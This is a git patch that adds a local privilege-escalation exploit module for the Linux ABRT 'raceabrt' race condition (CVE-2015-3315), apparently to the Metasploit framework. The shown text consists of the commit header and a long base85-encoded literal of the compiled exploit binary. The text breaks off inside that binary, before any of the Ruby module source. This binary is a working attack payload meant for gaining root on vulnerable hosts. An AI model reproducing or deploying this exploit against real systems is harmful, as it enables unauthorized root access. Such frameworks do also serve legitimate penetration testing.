From 5e11d363513375bbb1f3800304748f62241dd57e Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Tue, 16 Jan 2018 14:52:33 +0000 Subject: [PATCH] Add ABRT raceabrt Privilege Escalation module --- data/exploits/cve-2015-3315/raceabrt | Bin 0 -> 64240 bytes .../linux/local/abrt_raceabrt_priv_esc.rb | 189 ++++++++++++++++++ 2 files changed, 189 insertions(+) create mode 100644 data/exploits/cve-2015-3315/raceabrt create mode 100644 modules/exploits/linux/local/abrt_raceabrt_priv_esc.rb diff --git a/data/exploits/cve-2015-3315/raceabrt b/data/exploits/cve-2015-3315/raceabrt new file mode 100644 index 0000000000000000000000000000000000000000..a4824e061e047333e271d45b2aa8a2641c32166b GIT binary patch literal 64240 zcmeFa30xFcwm)9gT|hOobcv0klGtjips0{B2}F~ifI&sm3IZ_;gDeUnFmyLy;sPm1 zsI;ANCd(xAGV?NTCT}ut@@6uVjKLTa76mn%OD3XbF?+SG2`&L7#{PfLt!^3<-z@L* ze*e$^_x_S})m_d#_ndRjJ@?#Gx5_OUSqpid=K_CvPR~(pm5$@);GWv2)y&~6TnHD( zUCWJU^#ORgCzfiz5Xwj#t52@txa2L`?+GA$PS0_n{(7M1vQVFedip($JpHI%z;F3y zj$+)t_eb?W&#gfHaQu5wMn7sxw4*D~%5l^Wm3{Xw0CT1Ce=~91L{vm^VVsEj0RqOK z1dNfmR{-(D=z!`+A%8HJYN;O3CG{mmwIy6ZS!J1nTVGgK$rY3$P4$`JlklDL-+TS{ z^ZxsQ|9;Vbw=`(*R{uTAe=qjm*ZS`j{`+44T|Q-0GeMvFLJr5tyN#XP<$t~xNFu&p z6D{=T`?V3*wUqSG#rJEH@bJ9(vV6As7$nlzxqlPTpAywQ2K3cVmp?A05~I&yja7e= z%yCJll@s!(y*8UlcpC-lryDs=%dE`H&2Btp1R~c~tA%b)S*>*AQ(ZZYLTd9NXTKYX zq_%FMiCU-10~Y5wm#(?ZA;|+1>Ox&Lf-?@_mB{d&%nB~C< zb>XgRL3#1f22{#zqW5!Gx;3`B%{dWwv&&(XTsc-FkdDlhZ_+u#l%5$2M6bY~^?E_k zZZvW|YTb()-^m|VK8Sx8Xh$||7DQ*L>lVJ750g)d-Y;A)TA$KDpC-^Q{$1r<{9%Ab zH{1u%aMwD~HJ9I`Bmms#{UjicNdR7@Y-NlqO-u}pyGbT@-cxY5@8fJW0RWAig^-$j zN+QC`Io}HxefWFfJT7jVu)>$RX==h}=6wtPrgOx7zt^+<%{ov zp>kfmoit&gAh!uFnxO7S5|8+ND{QJf6MD2;g7WK35vmhVN=A>osfXL3wZ8#i)c$lB z>6@^YEU8;QL0Emx9<=}s&|JxQN8a>KpiPdy%?`9dpVXnzrv4gsmw_ITHy!YqnpaSs zNZjZLe~7>{-cvG8c&4Dvm2tvtlh9|m;Fg~vm=)^vvlx!%HdFK0AcP3=K?Z(;+|892 z0H*#?g8~A%jSw&xTcEa4<2X?6FLpPtAEdT+t*w^b0j2UO9nW*hk+XkL_Vyoe+k9FL zf1sP2y}q!zv^!O>`$=`nnE)qlg%$2cegldj-)~1Siaj)gyE8~LIZrPxq;38#Hz)d; za)`c+Pd$fFJA9-bBf@}b-Vj)b=T!|udAORdm0s4M0%V}U8m(*0>~X-dtt$a*5@0LF&Ky@V+IMUf6?I9eOsLI`3@eM)TDlrJglU6cP z(~DNn$$5T39A$j^GM9>e4w&xeKp#dPlfyq?14F~w)B~jtQZb&W2H`r z9?}8t<(zsq+ytiMy{!`LCe!=v8U^ZlhUJvJ=@jQ&hSol3ug@u}lLEZ^Cv2*pu8ji6 zk@=u`3T6P?s}=7ee3(_4Hxrwt2PSEwg*oU45(tRwcW39yyrj0=>>X19s6L9h*VwtwiFM}GD=2Vp zw8mf!Jb)yY%Xe@)_j|B|d7vaFwYiKBq&Dw!4!DH}6#03Y?upHPAo$Xhx-eI!pk%!m zLo2gK-e^taoMLx6ZqPEUclphS6uE&~G+CbjRz*HR82~8qZls)}Q1K`c@W^YR80xQ6 zI@~fdTrPpSmz0qU9$MgQYIB6no9#UB?Ip!cw_0uL1jr@d_oB50&DCp(ap--zH8UmM zn(iEllntpYXBen*aE_v+HsuTDvmF>%PC0q*_aIUPehzmDgmA6T;&Lp3D3ODy7 ze*#6XVHCN(^shrLj*&Zb4QM-{zJ;RZwhjFGh4Ll6^W$#$Ss)->jk`&fZ2ig2RuczE z#w89Ka1z>1P5ucITZ1oi4!|@-XIY=J)QqvGAr_V{-GTj2ttwD+`LX(HaX5ENT~E3JUJ&1dk|_)JR5a8ff)fkwh3P z8g*ZyTiyxj+j7-1ZH6@a9M{_5m&WAfs*zSK-)?yq0Pe`Osg)XpHmQ%pjfEay42F7n z7Lsr5e7^>pl0Y}#>qS4*i)n?wmuDw4Og39CEO%A-5ZY`tk0IO&gmCHrZK0n!4b0^u z6{|i4*DhO4Vo;^ufm$;JRm-3v7*r~Q5+OVDiWS6WtV*_3-W_viXSVvq*Tg{V_hH5X znIEQ;!3_L}Xd*l@8XAUbF~G9bUonVxuL!XW5Ew0?H4DO5za+CeaLgGAA3nTwG8G+1 z5j0ltJPnUFTV2U;J;ZRCVM^NqgygldJwT3C#K0TbAU~}&6$?DYXiL4IN^G4%Xqy6P z7ojRIxAi$pA99p)pfFih3))+uIC0=2LCq(sb_+K38o)wrF~ZCRbFY-LUj;HweGL+A z>^xshIE=~xS27$Z_c9);BPefqd)&N1#%2_9$~<;!B}6H` zjtJLHa)+SIYfSZ?=@uFZ!Uk^`O8^uFOOWPdW~*7O%SNqB&0xZx$M`Y9lkH&Rlh+!7 zB-jdyMS*h(i9#$(XTW8rY41Bn^v?mZ##37XU+z=k;rjAnoQ-*^14gEmES0*9nqtbE z(Ga@c+@^Fn6G~jssN-5s5JUnXx))SXfwCaBd%;>tb<59DbNoR(d1^f}No~!2rbpWd z*}dqgarZXVD!nv&{Hw(z6sV<)uz$gJzwuN878Lg@R$3amo2&`Ak;q_0W4JA}YN(%1 zK?ko`Qvt^@ahjSQ0EqiV*2d<3&iV?nD}iGU?s?@p^#NF2Y;)aB)=bbuhS8Q+u2-v2 zoWH7kWUl&0KLC~u%trX{z|?hK+HW}955{@b9X6njgJtVPImoAMqD?IWDyXs2ovS{^l2WtJ zIf-^5=~fHb0E>DDP_hBu5U$E`NGA*4_iW|dN(gN^NQcm{pTrgz(waXkZ$>?_Ms0nL zF!eUHRgzs8qsHAder$!pJS&IO!Vu65W54nm^@GW53=-wt37$Wrp;`$lLVmFxW0iC$ z*WL0CxOi1WS?eEh!4x&ByWmYgWz=+nv=2eP@qNfgG{`*GHuq)F$dRE)(lDwHt=c76 zVfK1^X*x^+I$H8&TCK}P%{XqFK+M57vgNXy0bYc<%ctgHUCL=bZE6|^aCsBQ*WL-f zZ7(CoDet;7eTP49_k_5cT!gOIkSOo`4H4nIUfwAYj5DEIu;NZbDnL~@e{^tbk!RI^p*1+U@gsL*4Qo+yN)KGlUgjfeo;_<67cD zf_IY7IgCmBnonb%$2tXXXp#@ROtJM3K*j_OyJ1uBK*x}S{1)8n@#L4MLN`&IhkvB`6W0Gs3G-IJTMYYdSDy+$h0}ft}b&hMHRo)#- zQ`dKb6b#CctKO94XA~HWj;^FO@9hnnmvG8g^--AlQp3iZeBtife2#0BZts^#zU3=d z_-f7SEwNDFO0zrtW>O<>tSxT^FvjHia?yp9(oM+fLixe?Z@q8&`_yLI-KR<7KP@Ba z#1g^KxOt{Of=VdV9L@D-hR}6eR#IPcTYV&3YHow44#Y~AEpH_RG*9i*GzFUoGh|P! zVJ|I>vk>7 zLcgG66O-0!Gf{|nLS?5NNezg9I%c3|rTRNaB)6QmtyImLE0bG(lX`t3Ed#mb7Ig+v zXvFB;><7(LJ(`O~{$aQu0M?Lm+)P8}r`YoZ`fNT8Yhon*b-Eain}%>a6U5PlojrA; z4KfrQ+XmNN@PKmQ38iJ3wx7kOBi!_A+LDxBXRJ5DuLRjDMHv~JObI^lT3u=8xoMI; z+?~lQOUx~jccF3@Y(kC|!;4LZCj&HTcpOpRgN?M=R%EM_00Nv!7wFAa4{JTpas}rA zlRL*tL!hhy(D&TU?PIAaGtN6kfoCZE6b8Nu;EkuALXqn^>+`t5;9cW>;XN!9=YHdM zSg#=|6{8$|V(MLQLw%}x2C_l7!7Cwo4P0`@G@o{cx_=)F zn+$(_rTQP^81-J!hsDMDd{SHEZt7NB_f8tJ)kjYf{rgG*HaODs;J=_!|I{PBpu{!O z_lbLzpp11zDU#=YRQPjV5ed_4QOa0FY9E}S*aYtyDtQSd-Y81FN~w=2wVgqEr@L2) zKosr*KG7SA8Xz5ut(MgO%>*T1@J>Y$0Vty1uzAgB^1e5wbN^lF6cNt7=b>a2}}Z@lq_vCh2iY+oa7 z;I^ck*%G$yP&mKetC#ot(v%qQ+sXl^6}K?r>?K5;*vDC%nErxo`3f}@kte3wSQ)gq zsT###Zv$-ODH^x_3?paZ;hl@ljVW($s#o4x9)GFv5-qdJUp~bwQO?wc?4YcBmx`?E z)kDiyD9tC3%u|0mhH=?=384_KcASe9Ghk(~@k?r?-UHITAGq9vN~>1}+dX30J_>N@ zS+RN(k^$ddleqd37P`jnr=gXNrz)=DxZ}@R8*o!-XM(v2YeG(5I$YrvbWMLp+m6q( z9!ESy9h}6>O(t=^5f0+<3ajWC4RdBDe-T7+?uO)}KHt$3-X*Rk>qg);y?i2~CV@cu zv;yAUkOC0&lkS*)dDB}^?v1*5_u%aCEFvlO(%aF2@vvG%tsr3_@2*KmyFfP z+=?h47q1?D(1xN+c>tTio_*dvfTcGi&vZ&h_a8mc^YI5ANB12)ade+oc(3DwlaN^Q z(S2Z`9$@wEr>rjEP>y2OCmo1C@Fc3^m{3cx%}VKkNMrDe!!OxsayMBY0(6&lOFX)t zp?QT-?5@6qr6Go_$0hk=9Yim8%xFQFI?vQ%yL5D;wXzf)R=OW$9X7mSR1TJcr;4L( zM=Puq$M3SP#l4caQqBQzE$ZUJp9-r!1~T>^E4Ie9jB~Hzd-gl8)x;=a3x9e`xL=h- zN0@t+u4@55i`CvID960dI0xVFq5rTMA|_{myjG0YmiXQo5N3+HNtECAdHxK4KmK*B znIqh3z7%y!sJmj8&Z~DPTnjS9qWfIm5CWE<xT1|VW=BW@97Dn6?sF*E{b#o^v#6!X1T&zAKTMX3{63{9^%c!#LeW~P1fHKB@lOg z1TtAzk|+b9I2tviMK*F6vS9=E;YRBZX}~bs(SS`i5#HVpp|zqwil8KZ2;Bh|^9P=u zmbK_sBd5*zDvb%D2kIDj!9<1WVS0u{Q%k;Z&E}9DkTnTG#1=pm0B3_@*ivA4>h4Cd z4Q8A(J=1acL|?lF0g#TQwj>|lg$Rp)=I=uhqbMtc91dPQ9VEQ3#Q}mZt9mLKT zRZ17S&4+lf=sk%AWCA*fQK~O$9mjY{dZJu^k#m{=Bnsd%CdFYD>%NEwxzF>Sxv;DV z;nM8P1gZ7zjB9ovQpbTvhqb={OezX9+fV3l%V$9e<>#oCFZDC1je>Hf|0vrTBpo_@ zf-v0GN(>wxK$5mMF>^tHeLM^KDBn!pXua#Omp`W1Een>!aGUp_l5hLIM z=Ln)%k+3fU4iOU0q9KfN3b@9hnHb;EKB$|UW6j(w>OmGk@o#|_T1mhQjbMG!anLV< z)foF^$S-cjU2HsK+P~4cq*hvP-Lc10I%-1KwS}j7``Ackl`3D+mf(+_@!izz8fC!r zXa{WoO^>xtJV;&7fJ)=Z?4WM3+k7ac!}M@ER*MiWRmU-TpwGA``!Be+J|JNATJS3M zBM%xJq3im>7kIyR@kxh3ZDxNTqVJH8bA)??0L2hZO&y$msr*!! z%sj0?2b42OJy^}urxDCm&c=5v-V&PG#U*;r!8w&b(aD`NTJnAF{7cw7{^d>j4z$p#p3{fRB`!o9kZ{uv`%xtwQs<+_-#t3lMBFETYfwC};ba4q z4(bVA%BKzLOMv!n&(3x)HDHl5ur&|WbJRVk@SM|_)@-Xm>Gc~g(ngGqXp(;o0N9Zh zS~%TLX>tgK9FD3lW4Dyj^F5Z)EJo=Jisx|c%}cuUiQYbqD#m7-IuV^;CIe;wzAJ-o z(1l<4@gJsqrCfkAdx$sXSp2tgm!KX4fF~Pjx?+WUX%zU23i9_EHQvfr{25u+VyH$j zUAfXtl6-FIR3ClJT4GFF2lZ^#&4eiu`Ma#K4atPX zXllBZDrky?VsRKdZ;B&&Ay$Y?ueYI|pW++|4|O5UN-&k#kUYiV!IUx%;ZErStcdzK zrXN26L{Rb=&S8QSjA#&}oKb&ymRVPkGc}ikB0^(&wVs#1N|b$ux-kv)IxBUeC$dR5 zsV}dX3h#|lC^Zu^JC!(|V^2#o1fsHE_E_W#6Y9*SU%zfQDQ8m;e@qPwcy{MK-Y_`b z)ch;7Grel#-HQ*$tn=C#fKi)+DsLM99`1GP+(I)kY6{ z5Z3nI0`3wxN0j1K|8ry@nCSTfJbT7AXtkg*Eh99)N4pmbN+kBkcp${w1OQpM4U-$Q zz!Cua5!&!ZyU~rBdWIe$qeqLWg-)z!vYusX{vFU^7{H8-6v)!~nYp2%UT<|KVn4)~ z+3IIT=x%y^I1|LcQzIDzcUdLxEXIJTnY@|+$r2C~$uL2#QABbCBN_e$IW;uwQvZQ= zbpkSp-UP-7qj@WW*Wj2QDbScnUWsyq40j0~_}uOWIQYm}sZ<*`Nj^DW9!xPkNavE= zHl7sN^s2NDKsWIROxtt#*W3&65HGAQ6jfI5zUD)wrmcXL2gf@N&A$4jp3TT1F%edm zcxOAbb^S*Di%bTJxfRiu{BzHECo>M6BR~L~7oGl=<%Qk_hrt;$89!d@?hmybR89BbK}%qV3!ig8ReL&AhYTYWMhZz zq^QXd_``s>^B(q)CsDaT4H=|bOK8v$EKDrJdkYG%1QRL?X!l##AfgP^%ey7dY4{Va zS01Z|^!TrQUqCk2Fw=uas1!+8(=Hp7l~;WyfGQueAy$DiOu;VC3j{-jps!R(^!(bN ze+WP=F`h>Q)p!b`Bzu|z*(_wm_6rk~OuBrF+ZsfTR_S502wh?7*0Gk{TZnhE6}yvEs&wKsXsv=3SFbJr4wNYjJp(n z7JIw<9|S1h<=w@I+Ca7x)~5NVfC1A)x)nc1;0HBMMB7x5m8|AzLmMaWwxAh&17#T= zXL)kb)-O@G`4Gws_z~F2inJCeN0@gcG8x79rgWPgUJrQBL|kwhpk*xX+1W$JCpU?i z8|qe_kEl8NT?>>kU?t^J-Q49`@CT)_WHNFYd1R-e0gKh1;813vJ(Jn-Qx;5L@OpmR?$Cifs7Soe|ob*C}UqdQG=TGPx_=+ZxHaS&XDHX}q%(L3ldTed2Kd|+zaO>3p!H+IdlcDfSi znfu0r^myS`*C(~z*{Pw@u6RHu93Z);WRcuStR(l?T=jk?Z|$L5uthcq z6`$3^xr)Q?1065Zj{hU$m@BvO&+2hba)i4U=X9nKJ=i6>B=xP4XNImWa- z(zKn#yIwxYn;z?I+NYSU%KJzuA1YpDu<5WPBe~rX>AiIu@!>LC(eeir@Z;qKEAQS+ zVJ~1=hJhh8Q-R=;>9LOFy~1GHImNYw;y$yrRa(UpSGaRN{!YbtR-qdO!V|Nx|kSOp(XB#Is_q9@; zb6o2(AX1KDi{1B*&sUZvsIX#6n&35JnUiqT+(YlZt-_=jc64MS+NfQC2aMox0id;; zie5lb@PLVdik=QYl>q9>hpzN$88%};l}LxKZU!8NMLVOCO(^aTpqS*ZVv%KaVW2ny z#o0Sj7nq<4>Wf5TXjgNyAOlxg|T=`0W}CSEv$DhELQOU z0Xk^I?8bD4x`3gkBO{3}*DC;a$#j;{wev+>mABk0aflqQc~giDW77Y@#4hODRHb*u zZDv|n72OJ7o#?B>2`2dhbDd&cw-RX`g7;k)cG$p?!6|=u4zww~N~IwC&rraU>;roi zG-}*)d?AU19VUK3Bcbm2bwma0j{=Y(DNta$P51qTuueuOwg6Imu7Nc@A3R zj58LC-Z1%6m{W(7r4DQA5`C`ZeI2@XlglRQGezaGd60<9W_G2L~~cb+5?YOO($iv4>Dv7nBv{e3 z{n41VPw;Hyki!6HQ*!82ylrdh>&I7J&-{*UV1Yr=ylA}$3e-jLR9FB~*{j}+w6{NCqPJnhU))QCdD4k6 zdKx9+Nk=ap35$rCl4bAg|3FOwQYDexV4wG7ps}|8sP`U$sren6(-GA!fC?ukn2jf(WyR7n>4xMXv$O64;qW!pO$XJUGhFO z%zwdhz>jU~KQIw=6PK=h0kgFgr{iLkua&n<+ix?zJPmv(?ea$^)35iN^W1UB znoAo$@on*jfGqw%U#gCGMw(u-38jr6`?i#(9Cpls8322q_~~PE+r!JOCp~*e zw?`}>-Ii#2uqpB(u=^*{OAO%Dd{( zSs6#Bm(GF~!DX~6JqTJFx|~MCQTYN!0g+zswV2Q2N*f1#TNo?ONPeHPcjR$H4~7~i z9p&9t%rKk~1a1p3l1N~YOWReG=_Ph@Gn!Gjm{G_mz!aUQQK21MK?|k5wDBX~7H3l6 zSjhWF>0rpX9#;%b#pl9S0k!%^VrEu7hR{2+8ykFtRHl?RUhr)(y>!qq{{5cPDO^M2 z$xF9#TVcwH8Ft9zB6Jw(HD7xhqwmF0lt?xz=rH?0S|>O|1xFjdw=ipdprJ zi%ku|iV9}>GC09ufzOm7;tiKCpfD(e)JNc;5w)d1?;@Oa(^_>60W5MaJV7UG1Aw4_ z^IB|fZPN*^a@D=e*wcA=!o)kD^O~3A)Oizo0~)8@pVjK|a?^ZMvmNpUF%3=;SDkaL z_qtXn9;fcdvd)4p(uU7H9mMBSp*00H@Id}BRA*}bEvnFxccizH!>0ZebxKF;yOe%l z7~B@XX)aW?2Ju&dC>{oJHz3GjQiZEdB(t`klA#bwfzsveYmKKY+y!-JuvyDgLQIOm zYDS?3>PWFEqidlENjYb^awXR?V=GjIQ_t-Wuw`mFMU83&*u4@oF{UguI^XdATprLn z#7yVsu3V#czH6BozL0BkOlt^$8{TYC|EwYCKnIek<#&W)nK7l^v0cOe$T0j{QOPJ% zH=)$~XzTkZ*nyRWdkr*e^cJB8s*{QW7+45W#4)Yr7F6R!0lem*UVonS#RwR3B7Dz3 zMJ=1G}TbI>v>}726x?my_)zP4u(X#m#8(x0~-(+VKREZ4@&Zi0v+KN!W zoOg0SE-TrK9`v?}9s5DF_rf<}V?k~hL$Hf=Lr$oG7bP)Y6F~&$FhD4jQW8NWy+4x# zLRa0v43=3Pi$)kpGcY2?12E>cWvl-N${Rb6%mu9s{m?5P=qk?l0v2-|0kkHtj;&a1 z)79c!zXwp3cU%6M4-7lEPz6uMTXq=nOT(Mr1Lugh<(L*~tf*8gNTG#2ra09*vTCP3#%1jLX|hPZ@nhgBSc7}{JOewEk} z!H$1{tB-Z%X5j?Ipks=g64+91&Vp%(!l`ceLY!$;* zZvvr}&hfXTTTPB|SFU+(u4JF(jfU8B)rX+(q$_QX&*|-nSrnEsnO?nTNlK3+9B22G zd(165?-)!5=+PLP|3rSK^AH1s&e0}Ra{~^-Wo+yW^>+;a-d8im^|}H8Uy& z?>JYk5DyG=r9e-D08uUxzDh_#kSZb^>v620}kfk zSlC|d<82AusUoNgymq445M(s#ZHbDF^gUZ$`U;J~{mC@=qWUAiGC$!TKe|6Nu*D*A zI{ty9`wyYP-#NO!M#Jepx*wzE$XwCUeP*&B-$`V@ej|}>#Bf<$&Ky@ptZS3mwM>Zb zPI(*0Y2L;TJZeRr&3A)pI*BKGx5RJ8wpwy+7I45Ku9gC&aR7<7?Euu(YJ!=sV&V^EKJ+L2K+)Vq-^`;wy4@&$eE9WGsx zs&vkzeE;EzJ-?%1tuxKN;i59fia`4bJ$#*OwD=|<-A}Nv?tuWHQT|FmSR|!ix#0Y; z+2@*Lb%0=y=ZJ@S!I^zy={D1LQSRhZ&N#%BV@i*+m-b`+Xyo@@MsSaf{keN*cW@n0y(KsR>a)2=5KrH9ao7)x4d=z(>z@_JII z{D~e9$w2M1xSz*8xL<_c;F<2fq0F>Brs=q;>1V{$px*SrJ4m>am2cfIF{%A^;+Kt| zQ|G4UmkC4pMdeHRb3Mg_ypx0YT*>Z#W#nE8lIt8NpT;3ZVhINhD-b|B={(|(cVquh z&U$Vc>nOyV$I?(7T!g$L9T5}=@8S`|cAkP>!IPtNxH0NSpOXS6ut+Ulq#ugk2XIAG zyOZ=>0X#R2hQed6e2flWZW-(S8Pifa8UqQ@dqeECdk1}t!O{TcT1#-rbc}93j;(lj z$^~b}xozIBToHKu((9$|w7%D;-$lz_QlCqQ!*SQPQic>>eg8EOhPCetMTMb$8#(VW ztwjV=lkD>4ct&JmucE4GL|=-!X%1ehb&Xu1e3I1m{JA$9@X?x4E=21`y3K#3$kW3o zG1uG}H@+~2t=~p09T; zHM;JWbY6U?K7+Yh!IQ9s#*ue8v<1k0)VE;0a&uv>SrqS4HkehvOT zr>JTxY5|4RACU6ul8&QGrAJc`=5ndmGB&d5oki@lvArNwC2RNzdXNXV)EQewGD!Aa zonYhwu{NjVzQ4gj{A{T`=6MG22tR}&IC_n8K>qmF_JL4&e}lZYtz|ji!c**%^E`}; z`+g3MZuU(;FjPc~BWMw)9B3af%6m_=@Wb1lxV2@uPTt$lGM{fH1@$gRV|chXlV;c5 zK#ij0y}i_knxD8;gZ(ZFJuB9+z=$_eeFJM}H$S(S zRxRiQe<>x+Tx-OJeCVOCD@|}^izx@}k?{x0`6pM{@GuzbDN~V7azVRaAnmv~8y~n( zanZicVpMw7pTI=8YLoHl133pGadGMvlms%X@Mxn7`E2z8hF~Y!LWSLOK45KX9MQZx z#x4I4**iPcH61X>k29DUcY_AAfWgEP5epcOI@GU#a!M}tu>tUUEgR4WX_r3Ay-+CU z;g9F4w|_$lFL^)C$Lf$r)6&Sk3^xbbuhSgy1p=B}!4bE?dk8w>3y`Bvl~7!GI;c^T zPyl@wJbmy-v;{?5zv-A$BH-pIe^mr4Tv9q7LT}#AqXVRsG`FzP(b~9 zpXiUZ${?RkK9UMTy_uL;GuY;&E2 zu>s!rp0R_#h7{$L{oYqfw_#j|uXfLgoT5& zZy^!Xa!lUryfoe!fl$9tdRh)1Rt?<`K^ZUxz2H5DN|X*(@;Tu~Dh4pUm@JeQ4}T7~ zBNhXEu>TW01%_cvIarh7_<`~^pkw2E$I~;>Z&<5O&_=|FsD@5#M$a7nN*VN=y+nic z;#5eLOF;vBchG-eJOd#d$3M{^1?B@ijH8G6IIz#A!6E1MIA~L-To|r^r0ItcnK%Q% zsJI>*Qt2W8B;{;ftZCOV`P>9&ddk@vG36_qO9dTFhrJ=&u)?|`LK2=#_a$-g=g>QfA{-~Deu>PX4>_pd}ad37o4dn@7KUVuRDl`&b{#i zW8nyC%>wj%Zvd1YXyh3h1n(1<>6;MWLGudSf2IsDo!bL#5tt4lY@>XLvagVX4zk)F z=#Kz-4fcNxJu3!8r*Z^(cC%xKvOoRXM?e z(hZiRC9Y)Fnpu|FC61!m)rEF@U2!~DR8weQ%Q-6xS647V z`qXP#VMW=!C6=OJzx&rLNFXwANBwVlS#Gt9De?fQ%sA znv%+r8iFJ$Ej1<8RW%MfS5#D84KOaf#8Fb@0LCfy1WTdAQL?_;QC7KzI;bfuDw#EF zR`@WA?2bZ*#Zg$Zro_QmLMzUYQD0qARpzkRokc|@c6+I_g0-r!TV_@;fb_EB%4rTu zU0G#<#Zj|?&=;=37i=en40~I)+siX}lIPZt*2t5+%qgsfT!pc>xcA^UGckWgV!kCYe`aF+jKq3NVm((@S;{S1wvbyke;HRpGaPkxUxDgHa<13xPNM}M3B?T5pML+yv>uapk-|65G6U4Ret z9Vn-=;qBfB+{Wj8zBMTS68At|KguZ`=D$;#`ri*2`aO={@A2D--#x$8%8nwPm~`C_ z=3IZnjmatV7o??UEF8;)b7RMjB{iqVAow%T1<`)(Z!9-59QFF}FpeK@h=@UbC@Lek zP-^3E833j`j(%!?z&wKL@qA3j8K~Gml|%IbxS>0He*5 zX;{{Tv_KcmpcUgfynYxcl2OC5c%6mg*u|g~sp>*6hx?cJ3vU(=GE5i+ynuk&x zH-^&eV$h0l9bP{S6iGZ082ZBrAdX`fgI0{ImY9#HSp}%P6_3&JYoPqnxOJ7ws0H?y z^w)4}D!X$91+~TYs)C}5s-krTFjioULGDXFP}Aze{ocUCwou)btDYf9`e7G$2eWhg1MI2;=|TS?9OGP}L3 zsuC8svaF<-ySb zSdP%Bq+}hJR#RoS&xFN9cb1B>%5`X8SUj_;5{+oN^P}d{16(p`(E750ORK7^1nVRs zlBokj06CS^3=9`!Y)MpLG z)nf9{471fh{8di71!G)7ljX9RRaA(%3Qvez=&aNfiQ1Q~hu=lA)JAJPRG<)31``3C z(->-#W)UVT+^I64t-%DT1$4SL)`X4WJKP!4A6re8qpGN?!ax2bQ9p&+gb$7m>FsJ%lfMr%!_|K(6L`bm--nFj?GY?%)?>qGYjI!HdM_RAJT}+itWy7@)^NEHX}hpLJfj7 z%Pz|eH7_k(Pd4Oo*udPpQYAA4elc+Yz{_b{R^q6us#!NQ{R8>o)Bj5LrBZ7*+?*7y z*7(9euXdJ}LLD?)8XRyx$1pWTn#l@Efv5@=rWIB)E=wvgO-f;3Et-Ta_O(t2GgHA; zp|Aq#RlI=)xw@um4H>FohHrQ&W(H;&o11G3D~mBJRzP1dS%OAvxw8suK}mg4Nl7t? z11qqbWzO{&WoKnEmq(6mpeV3nF#Ch5HND4nmT>Pyqj;iHSM;=OY`qob?04o z-&63z!lL4m(luq}>ndvOjt%$Tw-Mbm+(&&4In(|`z&YUWUBU4iMSi?d5L&RPTL2r2 z-_yVF`BHJ`BE^M~#>J)xhfvSmI&SXt>#UQgoPGmO!^fsDX}Xc;Zj(ZEPHv$|@2n1$ z!gS7!QmD>ZFX?qohu*1g2gLl&`Caq7=kG~FSFE2VG+po;pKk^^6Z0d*X5E4jA?dPS zKbhat37~l>rkGs%Dfq2JF!Ljg59;SfN)HJ0Bh7M1T4bWGEa-A z(zJ-BS17$5jxe@8+@t8@iLZRVgul^O$rak$B8sk1x+p^T(<>A&9&*XifvXa@DuJsK`2U{-$Q>rG1NYR1V3>~rg$Lk^A@a!neK^Xd3S18gmU=EO0I0DH=$A9t9;u{P6s{ijsr4Qy>56AN^Z<^zYjd zZS?Qh(Z5|sWq<3>(g2?wzyIpbAGBrF=QFMhwPhj4#o-s*czHd}1`PjWJB;B4|4jPF zh!qlo+tSi*vc%oCY-POV##z_RN@SZ7ts@!+Y*dzW9NQH5vD2nS$Nd0fpw(|%!Ewy# zzpTC-p-rtmF^A)rQ-4|gx`~1MAFkv$=7{_2XAfZ(cq>NMxCb%XCs8?^5SCk?p zb)rC@zz7?O5z^hb4aK6c23LX3`Goz5N|UKHY!OiCQYZ<0p_I{u9L4Dv9WM$j7xpI5 ziL4h8HHnbY2@bu~P0eQnlY4+vxQ~_Uq2t0v;v=jRD(g=s0g*p>Gr?}32xKDrJi92Y z2CzUZ8wkS!B*Jkv76Ie1IA92=q4(v&=$|1A*}(A9Cv`&ZMSz(L`vS;9?xWI(LUa)} zof<}b117>|H?c10?6k2G7n0%#x}e{G#VsaAV+$PrnXcL2wr-IMo4-QP4!YXaVx!qk`So{EQCs1 za1E27E1W2OgQf;fI1ZGCnYg4NKavw>;TBbomf{kgilPWW{0U2snunf@hBqEWxp{qI zJ!g3H2f)Rd3oF)ehPQ|qAvzo|hPR0wkrU|axuf0$hB=0Pe?mI?Uh3|3g5;uOD1D%v zT5$%#Nl7MtJtq+K=orW~hBy3m7U(e}ro|cF)jGt(I?ix}(n9n#VAjw>X))Rk1`S6k zZH!JvW5cmDG?k)1CZgV>a%;2&SHt^M9v4lYi8Xvk#LkPJP3aSqPK_P|VH!Rn`1I&j zD*u?$nb9R^W%!iRSgyXyw?=26)^L&1uSDli`L~pAi@p)cV7Nr--D7@7G;lm+_KvB;)xfjN8)JS; zEp#k%U<`e~*q~>bcg92!O#;jGjCqu5LRjX#G1n6pp)7M^%yOzR@HL>~(=neAy;?>c z(@Y4$8Q7^Yv^E)xEYmwCgb<8ine$`vs7)lx42<~|4cYcJ!Vic#DkM>} zLLDb$1`276SRtCL!+NVkM-uQ4bJN*YK1!>;SfZM}jrX#XKW6H}a1M z>N)~-0+wH*DMI&W6h+xcYU6a&e5@C2MOmmaS?5KiC>+Ce+&IWZvkHcrLf%845`C_K zljcIKy!02Oby6Du_0rd<6r>tv7UGZ&l`aA%OqzsFM5%&?L0XGzxHJav5z1TkMAZ^FhB9R+1QF!mJ$3sM}&36b0=36;j+8Ya;Yi_%G?4U&txl5Pji z2ML?3>kk3fzOI)L*$5A^9>n%x=-n);M-a&e_^ck*W zq&{3@q%hzaD-{CsIO!xXkC$Eq7qQYhlwZR|rBe5ChPkMT@)CRTTDl$$42cF>KcY4O z)R4r|2GW@YXcG|Vbx21oCM0tVR31?TS|jcw9Tc)DUkAD(8pvKo)KapMt$&+Ac|_Af zD&0iM<|#<(1mOmt*NOUBbd&T{uZz*o0ZN@k{|x}g??H_iahg8{+_4o^bsW+~NONQM zQ*T;E;I0uP&hr;ga;=?<=;O(NUyCP{5&irI0uGr^oenT80)ZLs!DSo@8DBn52uC_< z5S>L_PGE(jWhxF!^5OUqjkjjfAxn7ZM&f zwHc|Y+vxHyxJ>(ZT)Zfs_9rA@zPM?xAW=YxZX^^+975teCEiCO48t=`MdF8)IETbT zl=v2jT}Vt7;Vs6E!bO4`T1}YE$k2{p+5{v6;)OeF7?`R|c}vi-%G* z)s&>_8I`CX(1$>4W`CvyBZdiv+^W)vq4B`bramBUJ}8v^(d z04{3Hegpu2ay7?)s}-(ZKa{M4#JdC{Az{XP!2U*Hy{!iZElCEH81g&gRue!`vUFNGU^Mu#oMe?6Br#9dz@lV}>LUNh4a=*(Q z$S{{#WiInnxR%Ui_AnoLEoI4NKFP8_rz{*eFT?&ea+3)0et4-Ccx?PRVe)3=$H0NN 